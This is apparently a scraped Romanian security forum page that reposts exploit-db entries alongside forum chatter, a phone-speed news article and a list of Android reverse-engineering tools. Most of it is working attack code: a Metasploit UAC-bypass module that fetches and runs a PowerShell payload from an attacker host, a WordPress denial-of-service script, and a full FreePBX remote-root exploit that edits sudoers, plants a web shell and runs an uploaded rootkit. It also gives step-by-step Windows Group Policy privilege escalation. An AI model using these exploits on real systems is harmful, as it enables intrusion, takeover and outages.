Nytro

chimera_pe ChimeraPE demo: maps another executable into the target process and runs both. This is an alternative method to the classic RunPE (process hollowing) - can be used in case if we want to run the original exe also. WARNING: This is a 32-bit version. 64-bit variant coming soon. Link: https://github.com/hasherezade/demos/tree/master/chimera_pe

Windows - Fileless UAC Protection Bypass Privilege Escalation (Metasploit) ## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' class Metasploit3 < Msf::Exploit::Local Rank = ExcellentRanking include Exploit::EXE include Post::File include Post::Windows::Priv include Post::Windows::Runas include Post::Windows::Registry include Post::Windows::Powershell def initialize(info={}) super( update_info(info, 'Name' => 'Windows Escalate UAC Protection Bypass with Fileless', 'Description' => %q{ This module will bypass Windows UAC by utilizing eventvwr.exe and hijacking entries registry on Windows. }, 'License' => MSF_LICENSE, 'Author' => [ 'Matt Graeber', 'Enigma0x3', 'Pablo Gonzalez' # Port to local exploit ], 'Platform' => [ 'win' ], 'SessionTypes' => [ 'meterpreter' ], 'Targets' => [ [ 'Windows x86', { 'Arch' => ARCH_X86 } ], [ 'Windows x64', { 'Arch' => ARCH_X86_64 } ] ], 'DefaultTarget' => 0, 'References' => [ [ 'URL', 'https://enigma0x3.net/2016/08/15/fileless-uac-bypass-using-eventvwr-exe-and-registry-hijacking/' ],['URL','http://www.elladodelmal.com/2016/08/como-ownear-windows-7-y-windows-10-con.html'], ], 'DisclosureDate'=> "Aug 15 2016" )) register_options([ OptString.new('FILE_DYNAMIC_PAYLOAD',[true,'Payload PSH Encoded will be generated here (Not include webserver path)']), OptString.new('IPHOST',[true,'IP WebServer where File Payload will be downloaded']), OptBool.new('LOCAL',[true,'File Payload is in this machine?',true] ), ]) end def check_permissions! # Check if you are an admin vprint_status('Checking admin status...') admin_group = is_in_admin_group? if admin_group.nil? print_error('Either whoami is not there or failed to execute') print_error('Continuing under assumption you already checked...') else if admin_group print_good('Part of Administrators group! Continuing...') else fail_with(Failure::NoAccess, 'Not in admins group, cannot escalate with this module') end end if get_integrity_level == INTEGRITY_LEVEL_SID[:low] fail_with(Failure::NoAccess, 'Cannot BypassUAC from Low Integrity Level') end end def exploit validate_environment! case get_uac_level when UAC_PROMPT_CREDS_IF_SECURE_DESKTOP, UAC_PROMPT_CONSENT_IF_SECURE_DESKTOP, UAC_PROMPT_CREDS, UAC_PROMPT_CONSENT fail_with(Failure::NotVulnerable, "UAC is set to 'Always Notify'. This module does not bypass this setting, exiting..." ) when UAC_DEFAULT print_good 'UAC is set to Default' print_good 'BypassUAC can bypass this setting, continuing...' when UAC_NO_PROMPT print_warning "UAC set to DoNotPrompt - using ShellExecute 'runas' method instead" runas_method return end keys = registry_enumkeys('HKCU\Software\Classes\mscfile\shell\open\command') if keys == nil print_good("HKCU\\Software\\Classes\\mscfile\\shell\\open\\command not exist!") end key = registry_createkey('HKCU\Software\Classes\mscfile\shell\open\command') reg = "IEX (New-Object Net.WebClient).DownloadString(\'http://#{datastore['IPHOST']}/#{datastore['FILE_DYNAMIC_PAYLOAD']}\')" command = cmd_psh_payload(payload.encoded, 'x86',{:remove_comspec => true,:encode_final_payload => true}) if datastore['LOCAL'] if File.exists?("/var/www/html/#{datastore['FILE_DYNAMIC_PAYLOAD']}") File.delete("/var/www/html/#{datastore['FILE_DYNAMIC_PAYLOAD']}") end file_local_write("/var/www/html/#{datastore['FILE_DYNAMIC_PAYLOAD']}",command) end result = registry_setvaldata('HKCU\Software\Classes\mscfile\shell\open\command','bypass','C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -C ' + reg,'REG_SZ') if result execute_script("cwBhAGwAIABhACAATgBlAHcALQBPAGIAagBlAGMAdAA7AGkAZQB4ACgAYQAgAEkATwAuAFMAdAByAGUAYQBtAFIAZQBhAGQAZQByACgAKABhACAASQBPAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAC4ARABlAGYAbABhAHQAZQBTAHQAcgBlAGEAbQAoAFsASQBPAC4ATQBlAG0AbwByAHkAUwB0AHIAZQBhAG0AXQBbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACcANwBiADAASABZAEIAeABKAGwAaQBVAG0ATAAyADMASwBlADMAOQBLADkAVQByAFgANABIAFMAaABDAEkAQgBnAEUAeQBUAFkAawBFAEEAUQA3AE0ARwBJAHoAZQBhAFMANwBCADEAcABSAHkATQBwAHEAeQBxAEIAeQBtAFYAVwBaAFYAMQBtAEYAawBEAE0ANwBaADIAOAA5ADkANQA3ADcANwAzADMAMwBuAHYAdgB2AGYAZQA2AE8ANQAxAE8ASgAvAGYAZgAvAHoAOQBjAFoAbQBRAEIAYgBQAGIATwBTAHQAcgBKAG4AaQBHAEEAcQBzAGcAZgBQADMANQA4AEgAegA4AGkALwBxAC8ALwArADkAZgA0ADMAWAA2AE4AKwB0AGQAWQAvAHgAcgB0AHIANQBIADkARwB1AG0AdgA4AFIAbgA5AC8ANgBOAGYANAA5AHUALwB4AHUALwAxAGEANQB6ADgARwBsAC8AOQBHAG8AOQArAGoAZAAvADMAMQAzAGoAOQBhADEAUwAvAHgAagBsADkAZQAwAFgAZgAxADcAOQBHAFQAcAArAGMALwBCAG8AbAAvAGQANwBRAGYAegBuADkALwAvAGYAOQBOAFIAYgAwADcANQBUAGEARgBQAFEANQB2AG0AOQArAGoAVABuADkATABPAG0ALwAzADUAZgBlAFgAZABIAHYAUwAvAHAAdABTAHIAOAB2ADYATAArAE0ALwBwAHAAUgBIADcALwB4AHIANQBGAFEAegB4AFgAQgBuAEgARQBMADYAWAB2AHIAMQAvAGkAYwAvAG0AcAAvAGoAZQAxAGYANAA0AHoAKwB6AGEAbgA5AFMAMgBvAGgAVQBHAHIANgA1AEoAcgBhAGIATgBOAG4ARwBmADAAKwBwADkAOQA5ADMATABkAC8AagBSAGYAMABjADAARQB0ADAAMQAvAGoANAAxADkAagBRAG0AMQBYAGkAdQBmAEgAdgA4AGEAZABYADIATQBjAGYASQBMAGUAWAAxAEQATABLADYAKwBuAEwAcgBSAG4AagBOADIAVQA0AGYAMABNAC8AYgAvAGIAUABvAGEAWgBqADgASABXAHIALwBHAFUAZgBqAHUAbgBUADkAWgBFAGkANQBaAHcAKwBKAGoAYgAvAEMAUgA5AFUAdABKAG4ATwBmAGYAbwBVADIAQwA3AEIALwBNAE4ANAA0AHkAVwBEAGYAMQBkAEUANAAyAFgAdgA4AFoARgBGAEwAcwB2AEcAWABOAGcAZwBOADcASwAvAHcAYwA9ACcAKQAsAFsASQBPAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAE0AbwBkAGUAXQA6ADoARABlAGMAbwBtAHAAcgBlAHMAcwApACkALABbAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJACkAKQAuAFIAZQBhAGQAVABvAEUAbgBkACgAKQA=") print_good('Created registry entries to hijack!') end r = session.sys.process.execute("cmd.exe /c c:\\windows\\system32\\eventvwr.exe",nil,{'Hidden' => true, 'Channelized' => true}) check_permissions! end def validate_environment! fail_with(Failure::None, 'Already in elevated state') if is_admin? or is_system? winver = sysinfo['OS'] unless winver =~ /Windows Vista|Windows 2008|Windows [78]/ fail_with(Failure::NotVulnerable, "#{winver} is not vulnerable.") end if is_uac_enabled? print_status 'UAC is Enabled, checking level...' else if is_in_admin_group? fail_with(Failure::Unknown, 'UAC is disabled and we are in the admin group so something has gone wrong...') else fail_with(Failure::NoAccess, 'Not in admins group, cannot escalate with this module') end end end end Sursa: https://www.exploit-db.com/exploits/40268/

WordPress 4.5.3 - Directory Traversal / Denial of Service Path traversal vulnerability in WordPress Core Ajax handlers Abstract A path traversal vulnerability was found in the Core Ajax handlers of the WordPress Admin API. This issue can (potentially) be used by an authenticated user (Subscriber) to create a denial of service condition of an affected WordPress site. Contact For feedback or questions about this advisory mail us at sumofpwn at securify.nl The Summer of Pwnage This issue has been found during the Summer of Pwnage hacker event, running from July 1-29. A community summer event in which a large group of security bughunters (worldwide) collaborate in a month of security research on Open Source Software (WordPress this time). For fun. The event is hosted by Securify in Amsterdam. OVE ID OVE-20160712-0036 See also - CVE-2016-6896 - CVE-2016-6897 - #37490 - Improve capability checks in wp_ajax_update_plugin() and wp_ajax_delete_plugin() Tested versions This issue was successfully tested on the WordPress version 4.5.3. Fix WordPress version 4.6 mitigates this vulnerability by moving the CSRF check to the top of the affected method(s). Introduction WordPress is web software that can be used to create a website, blog, or app. A path traversal vulnerability exists in the Core Ajax handlers of the WordPress Admin API. This issue can (potentially) be used by an authenticated user (Subscriber) to create a denial of service condition of an affected WordPress site. Details The path traversal vulnerability exists in the file ajax-actions.php, in particular in the function wp_ajax_update_plugin(). The function first tries to retrieve some version information from the target plugin. After this is done, it checks the user's privileges and it will verify the nonce (to prevent Cross-Site Request Forgery). The code that retrieves the version information from the plugin is vulnerable to path traversal. Since the security checks are done at a later stage, the affected code is reachable by any logged on user, including Subscribers. Potentially this issue can be used to disclose information, provided that the target file contains a line with Version:. What is more important that it also allows for a denial of service condition as the logged in attacker can use this flaw to read up to 8 KB of data from /dev/random. Doing this repeatedly will deplete the entropy pool, which causes /dev/random to block; blocking the PHP scripts. Using a very simple script, it is possible for an authenticated user (Subscriber) to bring down a WordPress site. It is also possible to trigger this issue via Cross-Site Request Forgery as the nonce check is done too late in this case. Proof of concept The following Bash script can be used to trigger the denial of service condition. #!/bin/bash target="http://<target>" username="subscriber" password="password" cookiejar=$(mktemp) # login curl --cookie-jar "$cookiejar" \ --data "log=$username&pwd=$password&wp-submit=Log+In&redirect_to=%2f&testcookie=1" \ "$target/wp-login.php" \ >/dev/null 2>&1 # exhaust apache for i in `seq 1 1000` do curl --cookie "$cookiejar" \ --data "plugin=../../../../../../../../../../dev/random&action=update-plugin" \ "$target/wp-admin/admin-ajax.php" \ >/dev/null 2>&1 & done rm "$cookiejar" Sursa: https://www.exploit-db.com/exploits/40288/

FreePBX 13 / 14 - Remote Command Execution With Privilege Escalation #!/usr/bin/env python # -*- coding, latin-1 -*- ###################################################### # # # DESCRIPTION # # FreePBX 13 remote root 0day - Found and exploited by pgt @ nullsecurity.net # # # # AUTHOR # # pgt - nullsecurity.net # # # # DATE # # 8-12-2016 # # # # VERSION # # freepbx0day.py 0.1 # # # # AFFECTED VERSIONS # # FreePBX 13 & 14 (System Recordings Module versions: 13.0.1beta1 - 13.0.26) # # # # STATUS # # Fixed 08-10-2016 - http://issues.freepbx.org/browse/FREEPBX-12908 # # # # TESTED AGAINST # # * http://downloads.freepbxdistro.org/ISO/FreePBX-64bit-10.13.66.iso # # * http://downloads.freepbxdistro.org/ISO/FreePBX-32bit-10.13.66.iso # # # # TODO # # * SSL support (priv8) # # * parameter for TCP port # # # # HINT # # Base64 Badchars: '+', '/', '=' # # # ################################################################################ ''' Successful exploitation should looks like: [*] enum FreePBX version [+] target running FreePBX 13 [*] checking if target is vulnerable [+] target seems to be vulnerable [*] getting kernel version [!] Kernel: Linux localhost.localdomain 2.6.32-504.8.1.el6.x86_64 .... [+] Linux x86_64 platform [*] adding 'echo "asterisk ALL=(ALL) NOPASSWD:...' to freepbx_engine [*] triggering incrond to gaining root permissions via sudo [*] waiting 20 seconds while incrond restarts applications - /_!_\ VERY LOUD! [*] removing 'echo "asterisk ALL=(ALL) NOPASSWD:...' from freepbx_engine [*] checking if we gained root permissions [!] w00tw00t w3 r r00t - uid=0(root) gid=0(root) groups=0(root) [+] adding view.php to admin/.htaccess [*] creating upload script: admin/libraries/view.php [*] uploading ${YOUR_ROOTKIT} to /tmp/23 via admin/libraries/view.php [*] removing view.php from admin/.htaccess [*] rm -f admin/libraries/view.php [!] execute: chmod +x /tmp/23; sudo /tmp/23 & sleep 0.1; rm -f /tmp/23 [*] removing 'asterisk ALL=(ALL) NOPASSWD:ALL' from /etc/sudoers [*] removing all temp files [!] have fun and HACK THE PLANET! ''' import base64 import httplib import optparse import re from socket import * import sys import time BANNER = '''\033[0;31m ################################################################################ #___________ ________________________ ___ ____________ # #\_ _____/______ ____ ____\______ \______ \ \/ / /_ \_____ \ # # | __) \_ __ \_/ __ \_/ __ \| ___/| | _/\ / | | _(__ < # # | \ | | \/\ ___/\ ___/| | | | \/ \ | |/ \ # # \___ / |__| \___ >\___ >____| |______ /___/\ \ |___/______ / # # \/ \/ \/ \/ \_/ \/ # # _______ .___ # # \ _ \ __| _/____ ___.__. * Remote Root 0-Day # # / /_\ \ ______ / __ |\__ \< | | # # \ \_/ \ /_____/ / /_/ | / __ \ \___ | # # \_____ / \____ |(____ / ____| # # \/ \/ \/\/ # # # # * Remote Command Execution Exploit (FreePBX 14 is affected also) # # * Local Root Exploit (probably FreePBX 14 is also exploitable) # # * Backdoor Upload + Execute As Root # # # # * Author: pgt - nullsecurity.net # # * Version: 0.1 # # # ################################################################################ \033[0;m''' def argspage(): parser = optparse.OptionParser() parser.add_option('-u', default=False, metavar='<url>', help='ip/url to exploit') parser.add_option('-r', default=False, metavar='<file>', help='Linux 32bit bd/rootkit') parser.add_option('-R', default=False, metavar='<file>', help='Linux 64bit bd/rootkit') parser.add_option('-a', default='/', metavar='<path>', help='FreePBX path - default: \'/\'') args, args2 = parser.parse_args() if (args.u == False) or (args.r == False) or (args.R == False): print '' parser.print_help() print '\n' exit(0) return args def cleanup_fe(): print '[*] removing \'echo "asterisk ALL=(ALL) NOPASSWD:...' \ '\' from freepbx_engine' cmd = 'sed -i -- \' /echo \"asterisk ALL=(ALL) NOPASSWD\:ALL\">>' \ '\/etc\/sudoers/d\' /var/lib/asterisk/bin/freepbx_engine' command_execution(cmd) return def cleanup_lr(): print '[*] removing \'echo "asterisk ALL=(ALL) NOPASSWD:...' \ '\' from launch-restapps' cmd = 'sed -i -- \':r;$!{N;br};s/\\necho "asterisk.*//g\' ' \ 'modules/restapps/launch-restapps.sh' command_execution(cmd) return def cleanup_htaccess(): print '[*] removing view.php from admin/.htaccess' cmd = 'sed -i -- \'s/config\\\\.php|view\\\\.php|ajax\\\\.php/' \ 'config\\\\.php|ajax\\\\.php/g\' .htaccess' command_execution(cmd) return def cleanup_view_php(): print '[*] rm -f admin/libraries/view.php' cmd = 'rm -f libraries/view.php' command_execution(cmd) return def cleanup_sudoers(): print '[*] removing \'asterisk ALL=(ALL) NOPASSWD:ALL\' from /etc/sudoers' cmd = 'sudo sed -i -- \'/asterisk ALL=(ALL) NOPASSWD:ALL/d\' /etc/sudoers' command_execution(cmd) return def cleanup_tmpfiles(): print '[*] removing all temp files' cmd = 'find / -name *w00t* -exec rm -f {} \; 2> /dev/null' command_execution(cmd) return def check_platform(response): if (response.find('Linux') != -1) and (response.find('x86_64') != -1): print '[+] Linux x86_64 platform' return '64' elif (response.find('Linux') != -1) and (response.find('i686') != -1): print '[+] Linux i686 platform' cleanup_tmpfiles() sys.exit(1) return '32' else: print '[-] adjust check_platform() when you want to backdoor ' \ 'other platforms' cleanup_tmpfiles() sys.exit(1) def check_kernel(response): if response.find('w00t') != -1: start = response.find('w00t') + 4 end = response.find('w00tw00t') - 1 print '[!] Kernel: %s' % (response[start:end].replace('\\', '')) return check_platform(response[start:end]) def check_root(response): if response.find('uid=0(root)') != -1: start = response.find('w00t') + 4 end = response.find('w00tw00t') - 2 print '[!] w00tw00t w3 r r00t - %s' % (response[start:end]) return else: print '[-] we are not root :(' cleanup_fe() cleanup_lr() cleanup_tmpfiles() sys.exit(1) def build_request(filename): body = 'file=%s&name=a&codec=gsm&lang=ru&temporary=1' \ '&command=convert&module=recordings' % (filename) content_type = 'application/x-www-form-urlencoded; charset=UTF-8' return content_type, body def filter_filename(response): start = response.find('localfilename":"w00t') + 16 end = response.find('.wav') + 4 return response[start:end] def post(path, content_type, body): h = httplib.HTTP(ARGS.u) h.putrequest('POST', '%s%s' % (ARGS.a, path)) h.putheader('Host' , '%s' % (ARGS.u)) h.putheader('Referer' , 'http://%s/' % (ARGS.u)) h.putheader('Content-Type', content_type) h.putheader('Content-Length', str(len(body))) h.endheaders() h.send(body) errcode, errmsg, headers = h.getreply() return h.file.read() def encode_multipart_formdata(fields, filename=None): LIMIT = '----------lImIt_of_THE_fIle_eW_$' CRLF = '\r\n' L = [] L.append('--' + LIMIT) if fields: for (key, value) in fields.items(): L.append('Content-Disposition: form-data; name="%s"' % key) L.append('') L.append(value) L.append('--' + LIMIT) if filename == None: L.append('Content-Disposition: form-data; name="file"; filename="dasd"') L.append('Content-Type: audio/mpeg') L.append('') L.append('da') else: L.append('Content-Disposition: form-data; name="file"; filename="dasd"') L.append('Content-Type: application/octet-stream') L.append('') L.append(open_file(filename)) L.append('--' + LIMIT + '--') L.append('') body = CRLF.join(L) content_type = 'multipart/form-data; boundary=%s' % (LIMIT) return content_type, body def create_fields(payload): fields = {'id': '1', 'name': 'aaaa', 'extension': '0', 'language': 'ru', 'systemrecording': '', 'filename': 'w00t%s' % (payload)} return fields def command_execution(cmd): upload_path = 'admin/ajax.php?module=recordings&command=' \ 'savebrowserrecording' cmd = base64.b64encode(cmd) payload = '`echo %s | base64 -d | sh`' % (cmd) fields = create_fields(payload) content_type, body = encode_multipart_formdata(fields) response = post(upload_path, content_type, body) filename = filter_filename(response) content_type, body = build_request(filename) return post('admin/ajax.php', content_type, body) def check_vuln(): h = httplib.HTTP(ARGS.u) h.putrequest('GET', '%sadmin/ajax.php' % (ARGS.a)) h.putheader('Host' , '%s' % (ARGS.u)) h.endheaders() errcode, errmsg, headers = h.getreply() response = h.file.read() if response.find('{"error":"ajaxRequest declined - Referrer"}') == -1: print '[-] target seems not to be vulnerable' sys.exit(1) upload_path = 'admin/ajax.php?module=recordings&command' \ '=savebrowserrecording' payload = 'w00tw00t' fields = create_fields(payload) content_type, body = encode_multipart_formdata(fields) response = post(upload_path, content_type, body) if response.find('localfilename":"w00tw00tw00t') != -1: print '[+] target seems to be vulnerable' return else: print '[-] target seems not to be vulnerable' sys.exit(1) def open_file(filename): try: f = open(filename, 'rb') file_content = f.read() f.close() return file_content except IOError: print '[-] %s does not exists!' % (filename) sys.exit(1) def version13(): print '[*] checking if target is vulnerable' check_vuln() print '[*] getting kernel version' cmd = 'uname -a; echo w00tw00t' response = command_execution(cmd) result = check_kernel(response) if result == '64': backdoor = ARGS.R elif result == '32': backdoor = ARGS.r print '[*] adding \'echo "asterisk ALL=(ALL) NOPASSWD:...\' ' \ 'to freepbx_engine' cmd = 'sed -i -- \'s/Com Inc./Com Inc.\\necho "asterisk ALL=\(ALL\)\ ' \ 'NOPASSWD\:ALL"\>\>\/etc\/sudoers/g\' /var/lib/' \ 'asterisk/bin/freepbx_engine' command_execution(cmd) print '[*] triggering incrond to gaining root permissions via sudo' cmd = 'echo a > /var/spool/asterisk/sysadmin/amportal_restart' command_execution(cmd) print '[*] waiting 20 seconds while incrond restarts applications' \ ' - /_!_\\ VERY LOUD!' time.sleep(20) cleanup_fe() #cleanup_lr() print '[*] checking if we gained root permissions' cmd = 'sudo -n id; echo w00tw00t' response = command_execution(cmd) check_root(response) print '[+] adding view.php to admin/.htaccess' cmd = 'sed -i -- \'s/config\\\\.php|ajax\\\\.php/' \ 'config\\\\.php|view\\\\.php|ajax\\\\.php/g\' .htaccess' command_execution(cmd) print '[*] creating upload script: admin/libraries/view.php' cmd = 'echo \'<?php move_uploaded_file($_FILES["file"]' \ '["tmp_name"], "/tmp/23");?>\' > libraries/view.php' command_execution(cmd) print '[*] uploading %s to /tmp/23 via ' \ 'admin/libraries/view.php' % (backdoor) content_type, body = encode_multipart_formdata(False, backdoor) post('admin/libraries/view.php', content_type, body) cleanup_htaccess() cleanup_view_php() print '[!] execute: chmod +x /tmp/23; sudo /tmp/23 & sleep 0.1;' \ ' rm -f /tmp/23' cmd = 'chmod +x /tmp/23; sudo /tmp/23 & sleep 0.1; rm -f /tmp/23' setdefaulttimeout(5) try: command_execution(cmd) except timeout: ''' l4zY w0rk ''' setdefaulttimeout(20) try: cleanup_sudoers() cleanup_tmpfiles() except timeout: cleanup_tmpfiles() return def enum_version(): h = httplib.HTTP(ARGS.u) h.putrequest('GET', '%sadmin/config.php' % (ARGS.a)) h.putheader('Host' , '%s' % (ARGS.u)) h.endheaders() errcode, errmsg, headers = h.getreply() response = h.file.read() if response.find('FreePBX 13') != -1: print '[+] target running FreePBX 13' return 13 else: print '[-] target is not running FreePBX 13' return False def checktarget(): if re.match(r'^[0-9.\-]*$', ARGS.u): target = ARGS.u else: try: target = gethostbyname(ARGS.u) except gaierror: print '[-] \'%s\' is unreachable' % (ARGS.u) sock = socket(AF_INET, SOCK_STREAM) sock.settimeout(5) result = sock.connect_ex((target, 80)) sock.close() if result != 0: '[-] \'%s\' is unreachable' % (ARGS.u) sys.exit(1) return def main(): print BANNER checktarget() open_file(ARGS.r) open_file(ARGS.R) print '[*] enum FreePBX version' result = enum_version() if result == 13: version13() print '[!] have fun and HACK THE PLANET!' return if __name__ == '__main__': ARGS = argspage() try: main() except KeyboardInterrupt: print '\nbye bye!!!' time.sleep(0.01) sys.exit(1) #EOF Sursa: https://www.exploit-db.com/exploits/40232/

Cisco ASA / PIX - Privilege Escalation (EPICBANANA) # Exploit Title: Cisco ASA / PIX - Privilege Escalation (EPICBANANA) # Date: 19-08-2016 # Exploit Author: Shadow Brokers # Vendor Homepage: http://www.cisco.com/ Full Exploit: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40271.zip Sursa: https://www.exploit-db.com/exploits/40271/

Cisco ASA 8.x - Authentication Bypass (EXTRABACON) # Exploit Title: Cisco ASA 8.X Authentication Bypass # Date: 17-08-2016 # Exploit Author: Equation Group # Vendor Homepage: Cisco # Software Link: Cisco # Version: Cisco ASA 8.X # Tested on: Cisco ASA 8.4.2 # CVE : Not sure Requirements: * SNMP read (public) string * Access to SNMP service * SSH port accessible Full Exploit: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40258.zip Sursa: https://www.exploit-db.com/exploits/40258/

Cel mai recent smartphone de top al celor de la Samsung, Galaxy Note 7, pierde la scor meciul cu iPhone 6S când vine vorba despre viteza de deschidere a aplicaţiilor. Galaxy Note 7 este un flagship proaspăt lansat. iPhone 6S face în curând un an de cât a intrat pe piaţă. Cu toate astea, smartphone-ul celor de la Apple se dovedeşte mult mai rapid decât phablet-ul tocmai lansat de Samsung, scrie News.ro. În testul publicat pe YouTube de către cei de la PhoneBuff a fost testată exclusiv viteza cu care sunt deschise acelaşi set de aplicaţii şi jocuri pe cele două telefoane. În total, cele două dispozitive au fost cronometrate pentru deschiderea a 14 aplicaţii şi jocuri. În final, iPhone 6S a încheiat testul după 1 minut şi 21 de secunde. Galaxy Note 7 a avut nevoie de 2 minute şi 4 secunde. Cea mai mare diferenţă dintre cele două dispozitive s-a făcut la nivelul jocurilor. Acestea au pornit semnificativ mai repede pe iPhone 6S decât pe Galaxy Note 7. Aceste rezultate s-au înregistrat în pofida faptului că Note 7 dispune de dotări hardware superioare. iPhone 6S foloseşte un procesor dezvoltat acum doi ani şi are 2 GB memorie RAM, în timp Note 7 are un procesor lansat acum 6 luni şi 4 GB memorie RAM. Concluzia logică este că software-ul face diferenţa. Un sistem de operare optimizat special pentru un anumit set de componente va fi net superior unuia scalat pentru rula pe sute de configuraţii posibile. Apple deţine controlul complet asupra iPhone şi poate optimiza sistemul de operare iOS pentru a rula cât mai eficient. Prin urmare şi cerinţele hardware sunt mai mici atunci când software-ul este optimizat corect. De cealaltă parte avem Android, care, la fel ca Windows pe PC-uri, trebuie să ruleze pe un număr foarte mare de dispozitive. Sarcina optimizării software-ului ar trebui să cadă pe producător. Acesta, însă, este ocupat cu lansarea într-un ritm alert a noi şi noi dispozitive şi nu se preocupă de acest aspect, încercând să compenseze cu dotările hardware. Ba chiar, mai mult, producătorul adaugă şi el sarcini suplimentare sistemului de operare, prin pre-instalarea de aplicaţii mai mult sau mai puţin inutile pentru utilizatori. Aşa se ajunge la discrepanţa majoră în care un telefon cu dotări net superioare rulează mult mai slab decât unul cu componente mai slabe, dar un software bine optimizat. Fanii Android se vor putea bucura de aşa ceva abia în momentul în care Google va dezvolta propriul smartphone şi va optimiza special sistemul de operare pentru el. Galaxy Note 7 este disponibil în România la un preţ de 3.900 de lei. Versiunea corespunzătoare de iPhone 6S, cu acelaşi spaţiu de stocare de 64 GB, costă aproximativ 3.800 de lei. Sursa: http://www.digi24.ro/Stiri/Digi24/Sci-tech/Gadget/cel+mai+rapid+telefon

Este un progres imens de la vBulletin la IPBoard. Nu mai eu stiu cate linii de cod am modificat in acea platforma (vB)... 1. Este cel mai mare forum de securitate, nu de web design - te inteleg daca apar probleme de securitate banale, nu daca se vede urat o tema 2. Nu esti singurul, insa sunt multe persoane care "au crescut" pe forum si care au avut de castigat (un job de exemplu) de pe urma sa, dar apoi l-au uitat (stii tu termenul - leeching) 3. S-au pierdut posturile din luna ianuarie a acestui an, atat. Si am urmarit forumul in acea perioada, crede-ma, nu s-a pierdut mare lucru 4. Sunt multi care au interes sa invete, putini capabili (ca timp) sa ii ajute 5. Moderatorii, ca si mine, au familie si job si nu mai au timp de forum 6. Profilul utilizatorului RST nu este acela, doar ca aceia ies mai mult in evidenta. Forumul nu e destinat programatorilor ci pasionatilor de securitate IT care trebuie sa aiba in sange ceva din descrierea ta. Cei care sunt programatori intra aici si deprind trasaturi non-programatorice cum ar fi "think outside the box" Pentesterii (ca si mine) isi pierd timpul pe aici. Insa sunt prea putini care au timpul si daruirea necesara de a posta materiale de calitate. Nu ai mintit, te inteles, sunt de acord cu tine (nu in totalitate). Exista posibilitatea ca acest forum sa dispara, nu neg asta, dar cat timp putem ajuta comunitatea romaneasca sa se dezvolte pe calea cea dreapta, forumul va ramane in picioare. Ma gandesc la tine ca la altii: probabil ai calitatile tehnice si psihologice necesare de a-i ajuta pe altii, dar se pare ca nu o faci. De ce? Pentru ca noua, romanilor, ne place doar sa ne plangem si vrem sa ii vedem pe altii ca fac ceva. Daca vrei o schimbare, incepe prin tine. // Nytro

"In the meantime you can submit a paper at the Call for Papers. Maybe, you'll be the next cyber security rock star. :-)"

PS: Cand puneti imagini, incercati sa folositi si voi HTTPS in loc de HTTP...

Mai sunt probleme: 1. Legate de tema (o sa mai lucrez la ea) 2. Legate de imagini postate pe forum (o sa verific) 3. Legate de imagini de profil/avatar - daca nu va merge, uploadati din nou si ar trebui sa fie ok. Muie InvisionPower shitservices.

Lucrez la el, o sa fie probleme si o sa arate nasol intre timp.

Salut, Dupa cum puteti observa, au aparut cateva probleme legate de tema. Imi bag pula in mortii si ranitii astora de la IP Board.

Microsoft Windows Group Policy - Privilege Escalation (MS16-072) # Exploit Title: Group Policy Elevation of Privilege Vulnerability # Date: 08-08-2016 # Exploit Author: Nabeel Ahmed # Tested on: Windows 7 Professional (x32/x64) # CVE : CVE-2016-3223 # Category: Privilege Escalation SPECIAL CONFIG: Standard Domain Member configuration with valid credentials. (Standard Domain User with valid credentials) SUMMARY: This vulnerability allows an attacker to create/modify local Administrator account through a fake Domain Controller by creating User Configuration Group Policies. 1) Prerequisites: - Standard Windows 7 Fully patched and member of an existing domain. (e.g. domain.local) - Domain User Credentials are known with no Administrative rights. - Computer has to be connected on a network. - Fake Domain Controller 2) Reproduce: STEP 1: Determine domain of the target computer (e.g. domain.local) STEP 2: Boot system and determine FQDN of the device. (example. CLIENT.domain.local), this can be obtained by monitoring the network broadcast communication, which the system sends prior to loggin in. The username can be extracted from the loginscreen (E.g USER1) STEP 3: Create Active Directory for the domain you obtained in STEP 2 (domain.local). STEP 4: Create User with similar name and password as the target computer. (E.g. domain\USER1:password123!). STEP 5: Login on the target system with the known Username and Password without any network connection (using cached credentials). STEP 6: Establish network connection between the target system and the newly created Domain Controller. STEP 7: Create a Group Policy called "Create Local Admin" STEP 8: Edit the "Create Local Admin" Group Policy to create in the User Configuration section a new user called "TestAdmin" and add him to the group "Administrators". STEP 9: Open Command Prompt on the target system and execute the following command: "gpupdate /target:user /force" STEP 10: User Policy update will complete successfully. STEP 11: Confirm the newly created Administrator "TestAdmin" by executing the following command in Command Prompt: "net localgroup Administrators" STEP 12: "TestAdmin" user will be member of the Administrators group. 3) Impact: A regular Domain User can gain higher privileges on his system by creating a new administrator through Group Policies created on a fake Domain Controller 4) Solution: Install the latest patches from 14-06-2016 using Windows Update. 5) References: https://technet.microsoft.com/en-us/library/security/ms16-072.aspx https://support.microsoft.com/en-us/kb/3163622 6) Credits: Vulnerability discovered by Nabeel Ahmed (https://twitter.com/NabeelAhmedBE) and Tom Gilis (https://twitter.com/tgilis) of Dimension Data (https://www.dimensiondata.com) Sursa: https://www.exploit-db.com/exploits/40219/

25 Awesome Android Reverse Engineering Tools A curated list of awesome Android reverse engineering tools. Be sure to check out our list of IDA Pro alternatives and best deobfuscation tools, too. 1. SMALI/BAKSMALI smali/baksmali is an assembler/disassembler for the dex format used by dalvik, Android’s Java VM implementation. The syntax is loosely based on Jasmin’s/dedexer’s syntax, and supports the full functionality of the dex format (annotations, debug info, line info, etc.) 2. ANDBUG AndBug is a debugger targeting the Android platform’s Dalvik virtual machine intended for reverse engineers and developers. It uses the same interfaces as Android’s Eclipse debugging plugin, the Java Debug Wire Protocol (JDWP) and Dalvik Debug Monitor (DDM) to permit users to hook Dalvik methods, examine process state, and even perform changes. Unlike Google’s own Android Software Development Kit debugging tools, AndBug does not require or expect source code. It does, however, require that you have some level of comfort with Python, as it uses a concept of scripted breakpoints, called “hooks”, for most nontrivial tasks. 3. ANDROGUARD Androguard is a full python tool to play with Android files. DEX, ODEX APK Android’s binary xml Android resources Disassemble DEX/ODEX bytecodes Decompiler for DEX/ODEX files 4. APKTOOL A tool for reverse engineering 